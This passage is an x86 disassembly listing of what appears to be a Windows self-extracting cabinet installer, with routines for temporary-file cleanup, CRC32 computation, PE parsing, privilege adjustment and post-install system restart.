cmp eax, 3
jz short loc_1002622
push 4 ; dwFlags
push ebp ; lpNewFileName
push dword ptr [esi+4] ; lpExistingFileName
call ebx ; MoveFileExA
loc_1002622: ; CODE XREF: sub_10025BE+4A�j
; sub_10025BE+55�j ...
mov [esi+4], ebp
loc_1002625: ; CODE XREF: sub_10025BE+3F�j
mov esi, [esi]
loc_1002627: ; CODE XREF: sub_10025BE+38�j
cmp esi, edi
jnz short loc_10025F8
mov esi, off_1008008
mov ebp, ds:RemoveDirectoryA
mov edi, offset off_1008008
jmp short loc_100266B
; ---------------------------------------------------------------------------
loc_100263E: ; CODE XREF: sub_10025BE+AF�j
mov eax, [esi+4]
test eax, eax
jz short loc_1002669
push eax ; lpPathName
call ebp ; RemoveDirectoryA
test eax, eax
jnz short loc_1002665
call ds:GetLastError
cmp eax, 2
jz short loc_1002665
cmp eax, 3
jz short loc_1002665
push 4 ; dwFlags
push 0 ; lpNewFileName
push dword ptr [esi+4] ; lpExistingFileName
call ebx ; MoveFileExA
loc_1002665: ; CODE XREF: sub_10025BE+8C�j
; sub_10025BE+97�j ...
and dword ptr [esi+4], 0
loc_1002669: ; CODE XREF: sub_10025BE+85�j
mov esi, [esi]
loc_100266B: ; CODE XREF: sub_10025BE+7E�j
cmp esi, edi
jnz short loc_100263E
mov eax, hFile
cmp eax, 0FFFFFFFFh
jz short loc_1002687
push eax ; hObject
call ds:CloseHandle ; CloseHandle
or hFile, 0FFFFFFFFh
loc_1002687: ; CODE XREF: sub_10025BE+B9�j
mov esi, offset Buffer
push esi ; lpPathName
call ebp ; RemoveDirectoryA
test eax, eax
jnz short loc_10026AA
call ds:GetLastError
cmp eax, 2
jz short loc_10026AA
cmp eax, 3
jz short loc_10026AA
push 4 ; dwFlags
push 0 ; lpNewFileName
push esi ; lpExistingFileName
call ebx ; MoveFileExA
loc_10026AA: ; CODE XREF: sub_10025BE+D3�j
; sub_10025BE+DE�j ...
push offset CriticalSection ; lpCriticalSection
call ds:LeaveCriticalSection
pop edi
pop esi
pop ebp
pop ebx
retn
sub_10025BE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; BOOL __stdcall sub_10026BA(HWND, UINT, WPARAM, LPARAM)
sub_10026BA proc near ; DATA XREF: StartAddress+2�o
hDlg = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
cmp [ebp+arg_4], 10h
jz short loc_100272D
cmp [ebp+arg_4], 16h
jz short loc_100270A
cmp [ebp+arg_4], 110h
jnz short loc_1002729
cmp dword_1008038, 0
mov eax, [ebp+hDlg]
mov hWnd, eax
jz short loc_10026FC
push 0FFFFFFFDh ; hWndNewParent
push eax ; hWndChild
call ds:SetParent ; SetParent
push 1F4h ; dwMilliseconds
mov hWndNewParent, eax
call ds:Sleep ; Sleep
loc_10026FC: ; CODE XREF: sub_10026BA+27�j
push hEvent ; hEvent
call ds:SetEvent ; SetEvent
jmp short loc_100273F
; ---------------------------------------------------------------------------
loc_100270A: ; CODE XREF: sub_10026BA+D�j
cmp [ebp+arg_8], 0
jz short loc_1002729
call sub_10025BE
mov eax, hProcess
test eax, eax
jz short loc_100273F
push 1 ; uExitCode
push eax ; hProcess
call ds:TerminateProcess ; TerminateProcess
jmp short loc_100273F
; ---------------------------------------------------------------------------
loc_1002729: ; CODE XREF: sub_10026BA+16�j
; sub_10026BA+54�j
xor eax, eax
jmp short loc_1002742
; ---------------------------------------------------------------------------
loc_100272D: ; CODE XREF: sub_10026BA+7�j
and hWnd, 0
push 0 ; nResult
push [ebp+hDlg] ; hDlg
call ds:EndDialog ; EndDialog
loc_100273F: ; CODE XREF: sub_10026BA+4E�j
; sub_10026BA+62�j ...
xor eax, eax
inc eax
loc_1002742: ; CODE XREF: sub_10026BA+71�j
pop ebp
retn 10h
sub_10026BA endp
; =============== S U B R O U T I N E =======================================
sub_1002746 proc near ; CODE XREF: sub_1003272+2A4�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push esi
mov esi, offset Buffer
loc_1002750: ; CODE XREF: sub_1002746+17�j
mov cl, [eax]
cmp cl, 20h
jz short loc_100275C
cmp cl, 9
jnz short loc_100275F
loc_100275C: ; CODE XREF: sub_1002746+F�j
inc eax
jmp short loc_1002750
; ---------------------------------------------------------------------------
loc_100275F: ; CODE XREF: sub_1002746+14�j
mov ecx, eax
push edi
lea edi, [ecx+1]
loc_1002765: ; CODE XREF: sub_1002746+24�j
mov dl, [ecx]
inc ecx
test dl, dl
jnz short loc_1002765
sub ecx, edi
inc ecx
cmp ecx, 104h
pop edi
jb short loc_100277C
xor eax, eax
jmp short loc_10027B0
; ---------------------------------------------------------------------------
loc_100277C: ; CODE XREF: sub_1002746+30�j
mov cl, [eax]
cmp cl, 22h
jnz short loc_10027A6
jmp short loc_100278D
; ---------------------------------------------------------------------------
loc_1002785: ; CODE XREF: sub_1002746+4C�j
cmp cl, 22h
jz short loc_10027AA
mov [esi], cl
inc esi
loc_100278D: ; CODE XREF: sub_1002746+3D�j
inc eax
mov cl, [eax]
test cl, cl
jnz short loc_1002785
jmp short loc_10027AA
; ---------------------------------------------------------------------------
loc_1002796: ; CODE XREF: sub_1002746+62�j
cmp cl, 20h
jz short loc_10027AA
cmp cl, 9
jz short loc_10027AA
mov [esi], cl
inc esi
inc eax
mov cl, [eax]
loc_10027A6: ; CODE XREF: sub_1002746+3B�j
test cl, cl
jnz short loc_1002796
loc_10027AA: ; CODE XREF: sub_1002746+42�j
; sub_1002746+4E�j ...
and byte ptr [esi], 0
xor eax, eax
inc eax
loc_10027B0: ; CODE XREF: sub_1002746+34�j
pop esi
retn 4
sub_1002746 endp
; =============== S U B R O U T I N E =======================================
sub_10027B4 proc near ; CODE XREF: start_0+41�p
xor ecx, ecx
loc_10027B6: ; CODE XREF: sub_10027B4+27�j
push 8
mov eax, ecx
pop edx
loc_10027BB: ; CODE XREF: sub_10027B4+17�j
test al, 1
jz short loc_10027C8
shr eax, 1
xor eax, 0EDB88320h
jmp short loc_10027CA
; ---------------------------------------------------------------------------
loc_10027C8: ; CODE XREF: sub_10027B4+9�j
shr eax, 1
loc_10027CA: ; CODE XREF: sub_10027B4+12�j
dec edx
jnz short loc_10027BB
mov dword_1008040[ecx*4], eax
inc ecx
cmp ecx, 100h
jb short loc_10027B6
retn
sub_10027B4 endp
; =============== S U B R O U T I N E =======================================
sub_10027DE proc near ; CODE XREF: sub_100280D+172�p
; start_0+18A�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov edx, [esp+arg_8]
test edx, edx
mov eax, [esp+arg_0]
mov ecx, [esp+arg_4]
jz short locret_100280A
push esi
push edi
loc_10027F0: ; CODE XREF: sub_10027DE+28�j
movzx esi, byte ptr [ecx]
movzx edi, al
xor esi, edi
mov esi, dword_1008040[esi*4]
shr eax, 8
xor eax, esi
inc ecx
dec edx
jnz short loc_10027F0
pop edi
pop esi
locret_100280A: ; CODE XREF: sub_10027DE+E�j
retn 0Ch
sub_10027DE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_100280D(LPCSTR NumberOfBytesRead)
sub_100280D proc near ; CODE XREF: sub_1003272+4B�p
Buffer = dword ptr -114h
var_100 = word ptr -100h
lDistanceToMove = dword ptr -0D8h
var_7C = dword ptr -7Ch
nNumberOfBytesToRead= dword ptr -78h
var_1C = dword ptr -1Ch
lpWideCharStr = dword ptr -18h
var_14 = dword ptr -14h
lpName = dword ptr -10h
hObject = dword ptr -0Ch
var_8 = dword ptr -8
UsedDefaultChar = dword ptr -4
NumberOfBytesRead= dword ptr 8
push ebp
mov ebp, esp
sub esp, 114h
push ebx
xor ebx, ebx
push ebx ; hTemplateFile
push 10000000h ; dwFlagsAndAttributes
push 3 ; dwCreationDisposition
push ebx ; lpSecurityAttributes
push 3 ; dwShareMode
push 80000000h ; dwDesiredAccess
push [ebp+NumberOfBytesRead] ; lpFileName
call ds:CreateFileA ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp+hObject], eax
jz loc_1002B17
push esi
push edi
mov edi, ds:ReadFile
push ebx ; lpOverlapped
lea ecx, [ebp+NumberOfBytesRead]
push ecx ; lpNumberOfBytesRead
mov esi, 0F8h
push esi ; nNumberOfBytesToRead
lea ecx, [ebp+Buffer]
push ecx ; lpBuffer
push eax ; hFile
call edi ; ReadFile
test eax, eax
jz loc_1002B0C
cmp [ebp+NumberOfBytesRead], esi
jnz loc_1002B0C
cmp word ptr [ebp+Buffer], 5A4Dh
jnz short loc_10028B7
push ebx ; dwMoveMethod
push ebx ; lpDistanceToMoveHigh
push [ebp+lDistanceToMove] ; lDistanceToMove
push [ebp+hObject] ; hFile
call ds:SetFilePointer ; SetFilePointer
cmp eax, [ebp+lDistanceToMove]
jnz loc_1002B0C
push ebx ; lpOverlapped
lea eax, [ebp+NumberOfBytesRead]
push eax ; lpNumberOfBytesRead
push esi ; nNumberOfBytesToRead
lea eax, [ebp+Buffer]
push eax ; lpBuffer
push [ebp+hObject] ; hFile
call edi ; ReadFile
test eax, eax
jz loc_1002B0C
cmp [ebp+NumberOfBytesRead], esi
jnz loc_1002B0C
loc_10028B7: ; CODE XREF: sub_100280D+68�j
cmp [ebp+Buffer], 4550h
jnz loc_1002B0C
cmp [ebp+var_100], 0E0h
jb loc_1002B0C
cmp [ebp+var_7C], ebx
jz loc_1002B0C
cmp [ebp+nNumberOfBytesToRead], ebx
jz loc_1002B0C
cmp [ebp+nNumberOfBytesToRead], 40000h
ja loc_1002B0C
push [ebp+nNumberOfBytesToRead] ; dwBytes
push 8 ; dwFlags
push hHeap ; hHeap
call ds:HeapAlloc
mov esi, eax
cmp esi, ebx
mov [ebp+var_14], esi
jz loc_1002B0C
push ebx ; dwMoveMethod
push ebx ; lpDistanceToMoveHigh
push [ebp+var_7C] ; lDistanceToMove
push [ebp+hObject] ; hFile
call ds:SetFilePointer ; SetFilePointer
cmp eax, [ebp+var_7C]
jnz loc_1002B0C
push ebx ; lpOverlapped
lea eax, [ebp+NumberOfBytesRead]
push eax ; lpNumberOfBytesRead
push [ebp+nNumberOfBytesToRead] ; nNumberOfBytesToRead
push esi ; lpBuffer
push [ebp+hObject] ; hFile
call edi ; ReadFile
test eax, eax
jz loc_1002B0C
mov ecx, [ebp+nNumberOfBytesToRead]
cmp [ebp+NumberOfBytesRead], ecx
jnz loc_1002B0C
mov eax, esi
mov [ebp+UsedDefaultChar], ecx
cmp ecx, 16h
jmp short loc_1002993
; ---------------------------------------------------------------------------
loc_1002956: ; CODE XREF: sub_100280D+189�j
cmp byte ptr [eax], 0C0h
jnz short loc_100298B
push 4
pop ecx
mov edi, offset dword_100218C
mov esi, eax
xor edx, edx
repe cmpsd
jnz short loc_100298B
mov ecx, [eax+10h]
cmp ecx, 16h
mov [ebp+NumberOfBytesRead], ecx
jb short loc_100298B
cmp ecx, [ebp+UsedDefaultChar]
ja short loc_100298B
push ecx
push eax
push 0FFFFFFFFh
call sub_10027DE
test eax, eax
jz short loc_100299D
mov eax, [ebp+var_8]
loc_100298B: ; CODE XREF: sub_100280D+14C�j
; sub_100280D+15C�j ...
inc eax
dec [ebp+UsedDefaultChar]
cmp [ebp+UsedDefaultChar], 16h
loc_1002993: ; CODE XREF: sub_100280D+147�j
mov [ebp+var_8], eax
jnb short loc_1002956
jmp loc_1002B0C
; ---------------------------------------------------------------------------
loc_100299D: ; CODE XREF: sub_100280D+179�j
mov ecx, [ebp+var_8]
test cl, 3
jz short loc_10029C2
mov edi, [ebp+var_14]
mov esi, edi
jmp short loc_10029B5
; ---------------------------------------------------------------------------
loc_10029AC: ; CODE XREF: sub_100280D+1AB�j
dec [ebp+NumberOfBytesRead]
mov al, [ecx]
mov [esi], al
inc esi
inc ecx
loc_10029B5: ; CODE XREF: sub_100280D+19D�j
cmp [ebp+NumberOfBytesRead], ebx
jnz short loc_10029AC
dec [ebp+NumberOfBytesRead]
mov [ebp+var_8], edi
mov ecx, edi
loc_10029C2: ; CODE XREF: sub_100280D+196�j
movzx edx, word ptr [ecx+14h]
mov eax, [ecx+10h]
add eax, ecx
add ecx, 16h
cmp edx, ebx
mov [ebp+var_14], edx
mov [ebp+var_1C], eax
jz loc_1002B0C
mov edi, ds:WideCharToMultiByte
jmp short loc_10029EA
; ---------------------------------------------------------------------------
loc_10029E4: ; CODE XREF: sub_100280D+2F9�j
mov ecx, [ebp+var_8]
mov eax, [ebp+var_1C]
loc_10029EA: ; CODE XREF: sub_100280D+1D5�j
mov edx, ecx
add ecx, 4
cmp ecx, eax
mov [ebp+lpName], edx
ja loc_1002B0C
mov ax, [edx]
test al, 1
jnz loc_1002B0C
test byte ptr [edx+2], 1
jnz loc_1002B0C
movzx edx, word ptr [edx+2]
movzx eax, ax
mov esi, ecx
add ecx, eax
mov [ebp+lpWideCharStr], ecx
add ecx, edx
cmp ecx, [ebp+var_1C]
mov [ebp+var_8], ecx
ja loc_1002B0C
mov ecx, [ebp+lpWideCharStr]
shr eax, 1
mov [esi+eax*2-2], bx
mov eax, [ebp+lpName]
movzx eax, word ptr [eax+2]
push 2
shr eax, 1
mov [ecx+eax*2-2], bx
pop eax
sub esi, eax
mov word ptr [esi], 5Fh
sub esi, eax
mov word ptr [esi], 58h
sub esi, eax
mov word ptr [esi], 46h
sub esi, eax
mov word ptr [esi], 53h
sub esi, eax
lea eax, [ebp+UsedDefaultChar]
push eax ; lpUsedDefaultChar
push ebx ; lpDefaultChar
push ebx ; cchMultiByte
push ebx ; lpMultiByteStr
push 0FFFFFFFFh ; cchWideChar
push esi ; lpWideCharStr
push ebx ; dwFlags
push ebx ; CodePage
mov word ptr [esi], 5Fh
call edi ; WideCharToMultiByte
cmp eax, ebx
mov [ebp+NumberOfBytesRead], eax
jz loc_1002B03
cmp [ebp+UsedDefaultChar], ebx
jnz short loc_1002B03
push eax ; dwBytes
push 8 ; dwFlags
push hHeap ; hHeap
call ds:HeapAlloc
cmp eax, ebx
mov [ebp+lpName], eax
jz short loc_1002B0C
push ebx ; lpUsedDefaultChar
push ebx ; lpDefaultChar
push [ebp+NumberOfBytesRead] ; cchMultiByte
push eax ; lpMultiByteStr
push 0FFFFFFFFh ; cchWideChar
push esi ; lpWideCharStr
push ebx ; dwFlags
push ebx ; CodePage
call edi ; WideCharToMultiByte
push ebx ; nSize
push ebx ; lpBuffer
push [ebp+lpName] ; lpName
call ds:GetEnvironmentVariableA ; GetEnvironmentVariableA
test eax, eax
jnz short loc_1002B03
lea eax, [ebp+UsedDefaultChar]
push eax ; lpUsedDefaultChar
push ebx ; lpDefaultChar
push ebx ; cchMultiByte
push ebx ; lpMultiByteStr
push 0FFFFFFFFh ; cchWideChar
push [ebp+lpWideCharStr] ; lpWideCharStr
push ebx ; dwFlags
push ebx ; CodePage
call edi ; WideCharToMultiByte
cmp eax, ebx
mov [ebp+NumberOfBytesRead], eax
jz short loc_1002B03
cmp [ebp+UsedDefaultChar], ebx
jnz short loc_1002B03
push eax ; dwBytes
push 8 ; dwFlags
push hHeap ; hHeap
call ds:HeapAlloc
mov esi, eax
cmp esi, ebx
jz short loc_1002B0C
push ebx ; lpUsedDefaultChar
push ebx ; lpDefaultChar
push [ebp+NumberOfBytesRead] ; cchMultiByte
push esi ; lpMultiByteStr
push 0FFFFFFFFh ; cchWideChar
push [ebp+lpWideCharStr] ; lpWideCharStr
push ebx ; dwFlags
push ebx ; CodePage
call edi ; WideCharToMultiByte
push esi ; lpValue
push [ebp+lpName] ; lpName
call ds:SetEnvironmentVariableA ; SetEnvironmentVariableA
loc_1002B03: ; CODE XREF: sub_100280D+26F�j
; sub_100280D+278�j ...
dec [ebp+var_14]
jnz loc_10029E4
loc_1002B0C: ; CODE XREF: sub_100280D+50�j
; sub_100280D+59�j ...
push [ebp+hObject] ; hObject
call ds:CloseHandle ; CloseHandle
pop edi
pop esi
loc_1002B17: ; CODE XREF: sub_100280D+2B�j
pop ebx
leave
retn 4
sub_100280D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1002B1C proc near ; CODE XREF: sub_1002D83+64�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 10h
mov eax, [ebp+arg_0]
cdq
mov [ebp+var_C], eax
mov eax, [ebp+arg_4]
push esi
xor esi, esi
sub eax, esi
mov [ebp+var_10], 1
mov [ebp+var_8], edx
jz short loc_1002B45
dec eax
jnz short loc_1002B99
and [ebp+var_4], esi
jmp short loc_1002B4C
; ---------------------------------------------------------------------------
loc_1002B45: ; CODE XREF: sub_1002B1C+1F�j
mov [ebp+var_4], 2
loc_1002B4C: ; CODE XREF: sub_1002B1C+27�j
lea eax, [ebp+arg_0]
push eax
push 28h
push 0FFFFFFFFh
call ds:NtOpenProcessToken ; NtOpenProcessToken
test eax, eax
jl short loc_1002B99
cmp [ebp+arg_8], 0
mov eax, [ebp+arg_C]
jz short loc_1002B6D
test eax, eax
jz short loc_1002B6D
mov esi, [eax]
loc_1002B6D: ; CODE XREF: sub_1002B1C+49�j
; sub_1002B1C+4D�j
push eax
push [ebp+arg_8]
lea eax, [ebp+var_10]
push esi
push eax
push 0
push [ebp+arg_0]
call ds:NtAdjustPrivilegesToken ; NtAdjustPrivilegesToken
test eax, eax
push [ebp+arg_0]
jl short loc_1002B93
call ds:NtClose ; NtClose
xor eax, eax
inc eax
jmp short loc_1002B9B
; ---------------------------------------------------------------------------
loc_1002B93: ; CODE XREF: sub_1002B1C+6A�j
call ds:NtClose ; NtClose
loc_1002B99: ; CODE XREF: sub_1002B1C+22�j
; sub_1002B1C+40�j
xor eax, eax
loc_1002B9B: ; CODE XREF: sub_1002B1C+75�j
pop esi
leave
retn 10h
sub_1002B1C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1002BA0 proc near ; CODE XREF: sub_1002D83+169�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push esi
xor esi, esi
cmp [ebp+arg_0], esi
jz short loc_1002BE6
lea eax, [ebp+var_4]
push eax
push 28h
push 0FFFFFFFFh
call ds:NtOpenProcessToken ; NtOpenProcessToken
test eax, eax
jl short loc_1002BE6
push esi
push esi
push esi
push [ebp+arg_0]
push esi
push [ebp+var_4]
call ds:NtAdjustPrivilegesToken ; NtAdjustPrivilegesToken
test eax, eax
push [ebp+var_4]
jl short loc_1002BE0
call ds:NtClose ; NtClose
xor eax, eax
inc eax
jmp short loc_1002BE8
; ---------------------------------------------------------------------------
loc_1002BE0: ; CODE XREF: sub_1002BA0+33�j
call ds:NtClose ; NtClose
loc_1002BE6: ; CODE XREF: sub_1002BA0+A�j
; sub_1002BA0+1C�j
xor eax, eax
loc_1002BE8: ; CODE XREF: sub_1002BA0+3E�j
pop esi
leave
retn 4
sub_1002BA0 endp
; =============== S U B R O U T I N E =======================================
sub_1002BED proc near ; CODE XREF: sub_100468F+93�p
; sub_100468F+A5�p ...
xor eax, eax
retn
sub_1002BED endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_1002BF1 proc near ; CODE XREF: start_0:loc_100405B�p
NumberOfBytesWritten= dword ptr -4
push ecx
push ebp
xor ebp, ebp
push ebp ; nSize
push ebp ; lpBuffer
push offset Name ; "_SFX_CAB_SHUTDOWN_REQUEST"
call ds:GetEnvironmentVariableA ; GetEnvironmentVariableA
test eax, eax
jnz loc_1002CB6
push esi
push edi
mov esi, offset Value
push esi
push offset dword_10021A0
push offset Buffer
call sub_100244B
push ebp ; hTemplateFile
push 4000002h ; dwFlagsAndAttributes
push 1 ; dwCreationDisposition
push ebp ; lpSecurityAttributes
push 3 ; dwShareMode
push 0C0000000h ; dwDesiredAccess
push esi ; lpFileName
call ds:CreateFileA ; CreateFileA
mov edx, eax
cmp edx, 0FFFFFFFFh
mov hFile, edx
jz short loc_1002CB4
push ebx
mov ebx, offset dword_1008440
xor eax, eax
push ebp ; lpOverlapped
mov ecx, 84h
mov edi, ebx
rep stosd
lea eax, [esp+18h+NumberOfBytesWritten]
push eax ; lpNumberOfBytesWritten
mov edi, 210h
push edi ; nNumberOfBytesToWrite
push ebx ; lpBuffer
push edx ; hFile
mov dword_1008440, 6E776453h
mov dword_1008444, 10000h
mov dword_1008448, 0C0000013h
call ds:WriteFile ; WriteFile
test eax, eax
pop ebx
jz short loc_1002CA1
cmp [esp+10h+NumberOfBytesWritten], edi
jnz short loc_1002CA1
push esi ; lpValue
push offset Name ; "_SFX_CAB_SHUTDOWN_REQUEST"
call ds:SetEnvironmentVariableA ; SetEnvironmentVariableA
jmp short loc_1002CB4
; ---------------------------------------------------------------------------
loc_1002CA1: ; CODE XREF: sub_1002BF1+9A�j
; sub_1002BF1+A0�j
push hFile ; hObject
call ds:CloseHandle ; CloseHandle
or hFile, 0FFFFFFFFh
loc_1002CB4: ; CODE XREF: sub_1002BF1+52�j
; sub_1002BF1+AE�j
pop edi
pop esi
loc_1002CB6: ; CODE XREF: sub_1002BF1+13�j
pop ebp
pop ecx
retn
sub_1002BF1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame fpd=74h
; int __cdecl sub_1002CB9(UINT dwMessageId)
sub_1002CB9 proc near ; CODE XREF: StartAddress+24�p
; sub_1002EFD+18�p ...
Buffer = byte ptr -280h
Caption = byte ptr -80h
dwMessageId = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 280h
push esi
mov esi, [ebp+74h+dwMessageId]
cmp esi, 0FFFFFFFFh
jnz short loc_1002CD5
call ds:GetLastError
mov esi, eax
loc_1002CD5: ; CODE XREF: sub_1002CB9+12�j
cmp dword_1018C20, 0
jnz short loc_1002D2A
lea eax, [ebp+74h+Buffer]
push eax ; lpBuffer
push 200h ; nSize
push esi ; dwMessageId
call sub_1002556
and [ebp+74h+Caption], 0
push 80h ; nBufferMax
lea eax, [ebp+74h+Caption]
push eax ; lpBuffer
push 20000003h ; uID
push hInstance ; hInstance
call ds:LoadStringA ; LoadStringA
push 10010h ; uType
lea eax, [ebp+74h+Caption]
push eax ; lpCaption
lea eax, [ebp+74h+Buffer]
push eax ; lpText
push hWnd ; hWnd
call ds:MessageBoxA ; MessageBoxA
loc_1002D2A: ; CODE XREF: sub_1002CB9+23�j
call sub_10025BE
test esi, esi
jnz short loc_1002D34
inc esi
loc_1002D34: ; CODE XREF: sub_1002CB9+78�j
cmp dword_1008024, 0
jz short loc_1002D4F
push offset CriticalSection ; lpCriticalSection
call ds:DeleteCriticalSection
and dword_1008024, 0
loc_1002D4F: ; CODE XREF: sub_1002CB9+82�j
push esi ; uExitCode
call ds:ExitProcess ; ExitProcess
sub_1002CB9 endp
; ---------------------------------------------------------------------------
db 0CCh
; =============== S U B R O U T I N E =======================================
; DWORD __stdcall StartAddress(LPVOID)
StartAddress proc near ; DATA XREF: start_0+8E�o
push 0 ; dwInitParam
push offset sub_10026BA ; lpDialogFunc
push 0 ; hWndParent
push 64h ; lpTemplateName
push hInstance ; hInstance
call ds:DialogBoxParamA ; DialogBoxParamA
and hWnd, 0
test eax, eax
jz short locret_1002D80
push 0FFFFFFFFh ; dwMessageId
call sub_1002CB9
; ---------------------------------------------------------------------------
locret_1002D80: ; CODE XREF: StartAddress+20�j
retn 4
StartAddress endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=64h
; int __stdcall sub_1002D83(BOOL bRebootAfterShutdown, BOOL bForceAppsClosed, HMODULE hLibModule, int, int)
sub_1002D83 proc near ; CODE XREF: start_0+4EF�p
FileName = byte ptr -1B4h
VersionInformation= _OSVERSIONINFOA ptr -0B0h
var_18 = byte ptr -18h
var_14 = byte ptr -14h
var_4 = dword ptr -4
bRebootAfterShutdown= dword ptr 8
bForceAppsClosed= dword ptr 0Ch
hLibModule = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
lea ebp, [esp-64h]
sub esp, 1B4h
push ebx
push esi
push offset aWfp_idle_trigg ; "WFP_IDLE_TRIGGER"
xor ebx, ebx
push ebx ; bInheritHandle
push 100000h ; dwDesiredAccess
mov [ebp+64h+var_4], 10h
call ds:OpenEventA ; OpenEventA
mov esi, eax
cmp esi, ebx
jz short loc_1002DC5
push 0EA60h ; dwMilliseconds
push esi ; hHandle
call ds:WaitForSingleObject ; WaitForSingleObject
push esi ; hObject
call ds:CloseHandle ; CloseHandle
jmp short loc_1002DDC
; ---------------------------------------------------------------------------
loc_1002DC5: ; CODE XREF: sub_1002D83+2B�j
cmp [ebp+64h+hLibModule], ebx
jz short loc_1002DD1
push 0EA60h
jmp short loc_1002DD6
; ---------------------------------------------------------------------------
loc_1002DD1: ; CODE XREF: sub_1002D83+45�j
push 2710h ; dwMilliseconds
loc_1002DD6: ; CODE XREF: sub_1002D83+4C�j
call ds:Sleep ; Sleep
loc_1002DDC: ; CODE XREF: sub_1002D83+40�j
lea eax, [ebp+64h+var_4]
push eax
lea eax, [ebp+64h+var_14]
push eax
push ebx
push 13h
call sub_1002B1C
test eax, eax
jz loc_1002EF4
push edi
push offset LibFileName ; "advapi32.dll"
call ds:LoadLibraryA ; LoadLibraryA
cmp eax, ebx
mov [ebp+64h+hLibModule], eax
jz short loc_1002E29
push offset ProcName ; "InitiateSystemShutdownExA"
push eax ; hModule
call ds:GetProcAddress ; GetProcAddress
cmp eax, ebx
jz short loc_1002E29
push [ebp+64h+arg_10]
push [ebp+64h+bRebootAfterShutdown]
push [ebp+64h+bForceAppsClosed]
push ebx
push [ebp+64h+arg_C]
push ebx
call eax
jmp short loc_1002E38
; ---------------------------------------------------------------------------
loc_1002E29: ; CODE XREF: sub_1002D83+82�j
; sub_1002D83+92�j
push [ebp+64h+bRebootAfterShutdown] ; bRebootAfterShutdown
push [ebp+64h+bForceAppsClosed] ; bForceAppsClosed
push ebx ; dwTimeout
push ebx ; lpMessage
push ebx ; lpMachineName
call ds:InitiateSystemShutdownA ; InitiateSystemShutdownA
loc_1002E38: ; CODE XREF: sub_1002D83+A4�j
mov edi, eax
cmp edi, ebx
jnz loc_1002EDA
mov esi, ds:GetVersionExA
lea eax, [ebp+64h+VersionInformation]
push eax ; lpVersionInformation
mov [ebp+64h+VersionInformation.dwOSVersionInfoSize], 94h
call esi ; GetVersionExA
cmp [ebp+64h+VersionInformation.dwMajorVersion], 4
jbe short loc_1002EDA
lea eax, [ebp+64h+VersionInformation]
push eax ; lpVersionInformation
mov [ebp+64h+VersionInformation.dwOSVersionInfoSize], 9Ch
call esi ; GetVersionExA
test [ebp+64h+var_18], 40h
jz short loc_1002EDA
push 104h ; uSize
lea eax, [ebp+64h+FileName]
push eax ; lpBuffer
call ds:GetSystemDirectoryA ; GetSystemDirectoryA
test eax, eax
jz short loc_1002EDA
lea eax, [ebp+64h+FileName]
push 5Ch ; int
push eax ; char *
call ds:strchr ; strchr
pop ecx
pop ecx
push ebx ; hTemplateFile
push 2000000h ; dwFlagsAndAttributes
push 3 ; dwCreationDisposition
push ebx ; lpSecurityAttributes
push 7 ; dwShareMode
mov [eax+1], bl
push 0C0000000h ; dwDesiredAccess
lea eax, [ebp+64h+FileName]
push eax ; lpFileName
call ds:CreateFileA ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_1002EDA
push esi ; hFile
call ds:FlushFileBuffers ; FlushFileBuffers
push esi ; hObject
mov edi, eax
call ds:CloseHandle ; CloseHandle
cmp edi, ebx
jz short loc_1002EDA
push 1
call ds:NtShutdownSystem ; NtShutdownSystem
mov edi, eax
loc_1002EDA: ; CODE XREF: sub_1002D83+B9�j
; sub_1002D83+D6�j ...
cmp [ebp+64h+hLibModule], ebx
jz short loc_1002EE8
push [ebp+64h+hLibModule] ; hLibModule
call ds:FreeLibrary ; FreeLibrary
loc_1002EE8: ; CODE XREF: sub_1002D83+15A�j
lea eax, [ebp+64h+var_14]
push eax
call sub_1002BA0
mov eax, edi
pop edi
loc_1002EF4: ; CODE XREF: sub_1002D83+6B�j
pop esi
pop ebx
add ebp, 64h
leave
retn 14h
sub_1002D83 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_1002EFD(DWORD dwBytes)
sub_1002EFD proc near ; CODE XREF: sub_1002FAA+96�p
; sub_1002FAA+E5�p ...
dwBytes = dword ptr 4
push [esp+dwBytes] ; dwBytes
push 8 ; dwFlags
push hHeap ; hHeap
call ds:HeapAlloc
test eax, eax
jnz short locret_1002F1A
push 8 ; dwMessageId
call sub_1002CB9
; ---------------------------------------------------------------------------
locret_1002F1A: ; CODE XREF: sub_1002EFD+14�j
retn
sub_1002EFD endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_1002F1B(LPCSTR lpFileName)
sub_1002F1B proc near ; CODE XREF: start_0+146�p
; DATA XREF: start_0+1DA�o
lpFileName = dword ptr 4
push esi
push 0 ; hTemplateFile
push 8000000h ; dwFlagsAndAttributes
push 3 ; dwCreationDisposition
push 0 ; lpSecurityAttributes
push 3 ; dwShareMode
push 80000000h ; dwDesiredAccess
push [esp+1Ch+lpFileName] ; lpFileName
call ds:CreateFileA ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_1002F45
push eax ; dwMessageId
call sub_1002CB9
; ---------------------------------------------------------------------------
loc_1002F45: ; CODE XREF: sub_1002F1B+22�j
push 0 ; dwMoveMethod
push 0 ; lpDistanceToMoveHigh
push lDistanceToMove ; lDistanceToMove
push esi ; hFile
